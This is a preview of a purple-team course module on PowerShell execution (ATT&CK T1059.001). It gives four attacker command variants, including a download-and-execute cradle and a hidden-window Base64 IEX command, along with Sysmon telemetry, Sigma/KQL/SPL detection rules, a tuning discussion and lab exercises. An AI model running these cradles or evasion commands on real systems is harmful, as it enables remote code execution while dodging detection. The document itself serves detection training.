Sample Technique Sub — T1059.001 PowerShell (Preview from Module 3)
1. Scene
You're reviewing the morning's Sentinel alerts. Three PowerShell alerts fired overnight — all from the same endpoint, all within twelve minutes. The first used -EncodedCommand, the second used Invoke-Expression with a download cradle, the third used -WindowStyle Hidden with a Base64-encoded payload. Your current rule caught the first two. It missed the third. You don't know why until you look at the rule — it matches on -enc and IEX but not on -WindowStyle Hidden. The attacker tried three variants. Your rule caught two-thirds of them. That's the gap this sub closes.
2. Learning Objectives
By the end of this sub you will be able to:
- Execute T1059.001 in four variants and observe the telemetry each produces
- Identify the Sysmon Event 1 fields that distinguish malicious PowerShell from legitimate usage
- Write and tune a Sigma rule that catches all four variants without producing excessive false positives
3. The Technique
T1059.001 — Command and Scripting Interpreter: PowerShell
Adversaries use PowerShell to execute commands, download payloads, and run scripts in memory. PowerShell is the most commonly abused execution technique on Windows because it's signed by Microsoft, present on every Windows system, and capable of downloading and running code entirely in memory — no file touches disk, no traditional AV signature fires.
T1059.001 is a sub-technique of T1059 (Command and Scripting Interpreter). The parent technique covers all scripting interpreters — PowerShell (001), AppleScript (002), Windows Command Shell (003), Unix Shell (004), Visual Basic (005), Python (006), JavaScript (007). This sub covers the PowerShell variant only.
You've used PowerShell. You've probably written detection rules for it. You know that -EncodedCommand is suspicious and that IEX with a download cradle is a common malware pattern. This sub shows you the four major execution variants, the exact Sysmon fields that distinguish them, and the Sigma rule that catches all four.
4. Safety and Legal
Network boundary. The download cradle variant (Variant 2) reaches out to a URL — use a local URL or a test endpoint you control. Do not point it at production systems.
5. The Attack
Variant 1 — Encoded command (the baseline most rules catch)
# What the attacker runs
powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgB3AGgAbwBhAG0AaQAiAA==
# Decoded, this is: Invoke-Expression "whoami"
Variant 2 — Download cradle (downloads and executes in memory)
powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.20/test.ps1')"
Variant 3 — Base64 with hidden window (evades rules that match on -enc but not -WindowStyle)
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('d2hvYW1p')) | IEX"
Variant 4 — Living-off-the-land via PowerShell remoting (no powershell.exe in the command line)
# Attacker uses Invoke-Command from a compromised host
Invoke-Command -ComputerName PT-WIN-ENDPOINT -ScriptBlock { whoami }
# This spawns wsmprovhost.exe on the target — not powershell.exe
Each variant produces different Sysmon Event 1 fields. A rule that matches on powershell.exe -enc catches Variant 1 but misses Variants 3 and 4 entirely.
6. What Just Fired
Variant 1 — Sysmon Event 1:
{
"EventID": 1,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQ...",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "YOURLAB\\t.ashworth"
}
Variant 3 — Sysmon Event 1 (the one most rules miss):
{
"EventID": 1,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"[System.Text.Encoding]::UTF8.GetString(...)\"",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "YOURLAB\\t.ashworth"
}
No -enc flag. No IEX. No DownloadString. The command decodes Base64 via .NET and pipes to IEX inside the -Command argument. A rule matching on -enc or IEX as separate tokens misses this because IEX is inside a quoted string after a pipe.
Variant 4 — Sysmon Event 1 (on the target):
{
"EventID": 1,
"Image": "C:\\Windows\\System32\\wsmprovhost.exe",
"CommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"User": "YOURLAB\\t.ashworth"
}
No powershell.exe at all. The process is wsmprovhost.exe — the WinRM host process. Any rule matching on Image containing powershell.exe misses this entirely.
7. The Detection
title: Suspicious PowerShell Execution - Multi-Variant
id: 7c3e9f01-2a4b-5c6d-8e9f-0a1b2c3d4e5f
status: stable
logsource:
    category: process_creation
    product: windows
detection:
    selection_encoded:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-enc'
            - '-EncodedCommand'
            - 'FromBase64String'
    selection_cradle:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Net.WebClient'
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - 'IWR '
    selection_hidden:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-WindowStyle Hidden'
            - '-w hidden'
            - '-win hid'
    selection_remoting:
        Image|endswith: '\wsmprovhost.exe'
        ParentImage|endswith: '\svchost.exe'
    filter_system:
        User|startswith: 'NT AUTHORITY'
    condition: (selection_encoded or selection_cradle or selection_hidden or selection_remoting) and not filter_system
level: high
tags:
    - attack.execution
    - attack.t1059.001
// Sentinel KQL — T1059.001 Multi-Variant PowerShell Detection
// In DeviceProcessEvents, FileName is the process that was created and
// InitiatingProcessFileName is its parent; the Sigma Image field maps to FileName.
DeviceProcessEvents
| where TimeGenerated > ago(1h)
| where (
    // Variants 1-3: powershell.exe with suspicious arguments
    (FileName =~ "powershell.exe" and
     ProcessCommandLine has_any (
        "-enc", "-EncodedCommand", "FromBase64String",
        "Net.WebClient", "DownloadString", "IEX",
        "Invoke-Expression", "-WindowStyle Hidden",
        "-w hidden", "bypass"
    ))
    or
    // Variant 4: WinRM remoting (wsmprovhost.exe) spawned by svchost.exe
    (FileName =~ "wsmprovhost.exe" and
     InitiatingProcessFileName =~ "svchost.exe")
)
| where AccountName !startswith "SYSTEM"
| project TimeGenerated, DeviceName, FileName,
    ProcessCommandLine, AccountName,
    InitiatingProcessFileName
// Defender XDR Advanced Hunting — T1059.001
// Same schema as above: match the created process on FileName, and use the
// case-insensitive =~ so "PowerShell.exe" and "powershell.exe" both match.
DeviceProcessEvents
| where Timestamp > ago(1h)
| where (
    (FileName =~ "powershell.exe" and
     ProcessCommandLine has_any (
        "-enc", "-EncodedCommand", "FromBase64String",
        "Net.WebClient", "DownloadString", "IEX",
        "Invoke-Expression", "-WindowStyle Hidden",
        "-w hidden", "bypass"
    ))
    or
    (FileName =~ "wsmprovhost.exe" and
     InitiatingProcessFileName =~ "svchost.exe")
)
| where AccountName != "SYSTEM"
| project Timestamp, DeviceName, FileName,
    ProcessCommandLine, AccountName
Splunk SPL — T1059.001 Multi-Variant PowerShell Detection:
index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
((Image="*\\powershell.exe"
    (CommandLine="*-enc*" OR CommandLine="*EncodedCommand*"
     OR CommandLine="*FromBase64String*" OR CommandLine="*Net.WebClient*"
     OR CommandLine="*DownloadString*" OR CommandLine="*IEX*"
     OR CommandLine="*WindowStyle Hidden*" OR CommandLine="*-w hidden*"))
 OR
 (Image="*\\wsmprovhost.exe" ParentImage="*\\svchost.exe"))
| where User!="NT AUTHORITY\\SYSTEM"
| table _time Computer Image CommandLine User
| sort - _time
The rule has four selection blocks — one per variant. Because the condition joins them with or, any single variant triggers the alert. The NT AUTHORITY filter prevents the rule from firing on Windows' own PowerShell activity.
8. The Tuning Loop
False-positive sources for this rule:
Environmental FPs: IT automation scripts running as domain users with -EncodedCommand (SCCM, Intune, monitoring tools). Fix: exclude by parent process (CcmExec.exe, IntuneManagementExtension.exe) rather than by command content.
Rule-logic FPs: bypass in the command line matches legitimate Set-ExecutionPolicy Bypass during software installation. Fix: require bypass AND at least one other suspicious indicator (download cradle, hidden window, encoding).
Baseline FP rate: 3–8 per day in a typical 800-endpoint environment after tuning. Driven primarily by IT automation. Most are resolved by parent-process exclusions within the first week.
Continuous rhythm: retest monthly. New automation tools get deployed. Each one may produce command lines that match the rule. The monthly retest catches new FPs before they become alert fatigue.
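To see the gap the four selections close, and what the tuning in this section changes, here is an added Python check (not course material) that replays the rule logic over the three Sysmon events shown in section 6 plus two constructed benign-looking records from the tuning discussion (an SCCM job and an installer using Bypass on its own). Matching is a case-insensitive contains over the same terms as the Sigma rule, not a real Sigma backend, and every event value here is made up for the example.

```python
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD, SVCHOST = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\svchost.exe"
# Constructed Sysmon Event 1 records: the three from section 6 plus two benign-looking ones for tuning.
EVENTS = {
    "v1_encoded": {"Image": PS, "ParentImage": CMD, "User": r"YOURLAB\t.ashworth",
                   "CommandLine": "powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQ..."},
    "v3_hidden": {"Image": PS, "ParentImage": CMD, "User": r"YOURLAB\t.ashworth",
                  "CommandLine": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString(...)"'},
    "v4_remoting": {"Image": r"C:\Windows\System32\wsmprovhost.exe", "ParentImage": SVCHOST,
                    "User": r"YOURLAB\t.ashworth", "CommandLine": r"C:\Windows\system32\wsmprovhost.exe -Embedding"},
    "fp_sccm": {"Image": PS, "ParentImage": r"C:\Windows\CCM\CcmExec.exe", "User": r"YOURLAB\svc-sccm",
                "CommandLine": "powershell.exe -NoProfile -EncodedCommand UwBlAHQALQBMAG8AYwBhAHQAaQBvAG4A..."},
    "fp_bypass": {"Image": PS, "ParentImage": CMD, "User": r"YOURLAB\t.ashworth",
                  "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\install.ps1"},
}
SELECTIONS = {  # the Sigma selections from section 7, plus the 'bypass' term the KQL version adds
    "encoded": ["-enc", "-EncodedCommand", "FromBase64String"],
    "cradle": ["Net.WebClient", "DownloadString", "DownloadFile", "Invoke-WebRequest", "IWR "],
    "hidden": ["-WindowStyle Hidden", "-w hidden", "-win hid"],
    "bypass": ["bypass"],
}

def _ends(value, suffix):
    return value.lower().endswith(suffix.lower())
def _has_any(value, terms):
    return any(t.lower() in value.lower() for t in terms)

def naive_rule(e):
    """The rule from the scene: powershell.exe with -enc or IEX anywhere in the command line."""
    return _ends(e["Image"], r"\powershell.exe") and _has_any(e["CommandLine"], ["-enc", "IEX"])

def indicators(e):
    """Names of the selections an event hits; remoting keys on the WinRM host, not powershell.exe."""
    hits = set()
    if _ends(e["Image"], r"\powershell.exe"):
        hits = {n for n, terms in SELECTIONS.items() if _has_any(e["CommandLine"], terms)}
    if _ends(e["Image"], r"\wsmprovhost.exe") and _ends(e["ParentImage"], r"\svchost.exe"):
        hits.add("remoting")
    return hits

def multi_variant_rule(e):
    """Untuned rule: any selection fires, unless the user is a system account."""
    return bool(indicators(e)) and not e["User"].upper().startswith("NT AUTHORITY")

def tuned_rule(e):
    """Section 8 tuning: skip known automation parents; 'bypass' alone is not enough."""
    if _ends(e["ParentImage"], r"\CcmExec.exe") or _ends(e["ParentImage"], r"\IntuneManagementExtension.exe"):
        return False
    return multi_variant_rule(e) and bool(indicators(e) - {"bypass"})
```

Running the three rules over EVENTS reproduces the scene: the naive rule misses v3_hidden and v4_remoting, the untuned multi-variant rule catches all three but also both false positives, and the tuned rule keeps the true positives while dropping the SCCM and bypass-only records.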
9. Decision Exercise
Your rule fires on this command line:
powershell.exe -ExecutionPolicy Bypass -File "C:\ProgramData\Microsoft\Updates\update.ps1"
The process ran as YOURLAB\t.ashworth at 02:14 AM. The parent process is svchost.exe. The file update.ps1 does not exist on disk when you check.
Which of these is the correct assessment?
A. Environmental FP — a scheduled update script that has since been cleaned up.
B. Suspicious — the file ran at 2 AM, the parent is svchost (unusual for a user-context script), and the file is gone. Investigate as potential malicious execution.
C. Rule-logic FP — -ExecutionPolicy Bypass is too broad a match and should be removed from the rule.
D. Benign TP — a legitimate script that happened to use bypass.
Model answer:
B is correct. Three indicators converge: execution at 02:14 AM (outside business hours for a finance user), parent process svchost.exe (scheduled tasks and services, not interactive user activity), and the script file no longer exists on disk (cleanup after execution — a common attacker pattern). Each indicator alone might be benign. Together they warrant investigation. The correct next step is checking the Scheduled Tasks on the endpoint for what created this execution, and checking the Sysmon file-creation events for when update.ps1 was written and by what process.
10. Try-it
Fire all four variants on PT-WIN-ENDPOINT (logged in as YOURLAB\t.ashworth):
# Variant 1 — Encoded command
Invoke-AtomicTest T1059.001 -TestNumbers 4
# Variant 2 — Download cradle (uses a safe local test)
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Variant 3 — Hidden window (manual)
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "whoami | Out-File C:\Temp\test-v3.txt"
# Variant 4 — Remoting (requires WinRM enabled)
Invoke-Command -ComputerName localhost -ScriptBlock { whoami }
Check each SIEM. For each variant, run the detection query from the tabs above. Record which variants fired in each SIEM and the MTTD.
Expected result: Variants 1–3 should fire in all three SIEMs. Variant 4 fires only if your rule includes the wsmprovhost.exe selection block. If Variant 4 doesn't fire, add the selection block and retest.
Cleanup:
Invoke-AtomicTest T1059.001 -TestNumbers 4 -Cleanup
Invoke-AtomicTest T1059.001 -TestNumbers 1 -Cleanup
Remove-Item C:\Temp\test-v3.txt -ErrorAction SilentlyContinue
11. Reference Card
powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('...')"
powershell.exe -WindowStyle Hidden -Command "[Convert]::FromBase64String('...') | IEX"
Invoke-Command -ComputerName TARGET -ScriptBlock { ... }
WinRM variant: Image = wsmprovhost.exe, ParentImage = svchost.exe
2. Require -bypass AND one other indicator (not standalone)
3. Baseline: 3–8 FPs/day after tuning in an 800-endpoint environment
You've built the lab and understand the validation gap.
Module 0 showed you why detection rules fail silently — vendor schema changes, attacker tool evolution, environment divergence, tuning drift. Module 1 gave you a working four-environment, three-SIEM purple-team lab. From here, you walk the kill chain technique by technique.
- 61 ATT&CK techniques across 12 tactic modules — Initial Access through Impact, each walked end-to-end with attack commands, annotated telemetry, and multi-SIEM detection rules
- Every detection in four formats — Sigma rule (canonical), Sentinel KQL, Defender XDR Advanced Hunting KQL, and Splunk SPL or Elastic. Tabbed side-by-side in every technique sub
- Module 14 Capstone — CHAIN-HARVEST — full purple-team exercise on an AiTM credential-phishing chain. Multi-stage attack, detection results across all three SIEMs, coverage gaps, tuning recommendations
- Programme template — coverage matrix, MTTD per technique, FP rates, detection quality scores, remediation backlog. Populated as you work, presentable to leadership by Module 14
- Public Sigma rule repo — every detection rule in a GitHub repository. Alumni contribute via PR. The artefacts outlive the course